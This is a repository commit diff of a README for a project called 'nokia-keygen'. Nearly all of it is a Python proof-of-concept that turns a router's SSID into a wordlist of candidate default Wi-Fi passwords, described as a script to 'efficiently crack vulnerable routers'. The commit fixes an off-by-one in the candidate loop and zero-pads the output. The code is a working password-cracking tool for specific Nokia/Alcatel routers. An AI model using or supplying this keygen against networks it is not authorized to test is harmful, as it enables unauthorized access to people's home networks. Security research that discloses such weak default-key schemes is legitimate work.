Home Explore Help
Sign In
g
/
nokia-keygen
2
0
Fork 1
Files Issues 0 Pull Requests 0 Wiki
Browse Source

Update 'Readme.md'

nico 4 years ago
parent
350e1aa5dd
commit
0447c7daad
1 changed files with 18 additions and 17 deletions
Split View Show Diff Stats
  1. 18 17
      Readme.md

+ 18 - 17
Readme.md
View File 

@@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
 
 import argparse, base64,  hashlib, re
 
 
 def genpwd_longpasswd(oui, serialnum):
 
-    def str2md5(string):
 
-        m = hashlib.md5()
 
-        m.update(string.encode("ascii"))
 
-        return m.digest()
 
+	def str2md5(string):
 
+		m = hashlib.md5()
 
+		m.update(string.encode("ascii"))
 
+		return m.digest()
 
 
-    #secret1 = "%s-ALCL%s" % (oui, serialnum)
 
-    secret2 = "%s-01%u" % (oui, int(serialnum, 16))
 
+	#secret1 = "%s-ALCL%s" % (oui, serialnum)
 
+	secret2 = "%s-01%u" % (oui, int(serialnum, 16))
 
 
-    #md5_secret1 = str2md5(secret1)
 
-    md5_secret2 = str2md5(secret2)
 
+	#md5_secret1 = str2md5(secret1)
 
+	md5_secret2 = str2md5(secret2)
 
 
-    #wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
 
+	#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
 
 
-    lower = upper = 0
 
+	lower = upper = 0
 
 
-    for i in range(8):
 
-        upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
 
-        lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
 
+	for i in range(8):
 
+		upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
 
+		lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
 
 
-    longpasswd = ((upper<<32)+lower)%0x2540be400
 
+	longpasswd = ((upper<<32)+lower)%0x2540be400
 
 
-    return longpasswd
 
+	return longpasswd
 
 
 parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
 
 parser.add_argument("ssid", type=str, help="the ssid to attack")
 
@@ -551,8 +551,9 @@ for s in ssids:
 
         serialBytes = args.ssid
 
         for r in s.split("[A-F0-9]{4}"):
 
             serialBytes = serialBytes.replace(r, "")
 
-        for i in range(0xffff):
 
-            print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
 
+        for i in range(0xffff + 1):
 
+            candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
 
+            print(f"{candidate:010}")
 
         break
 
 ```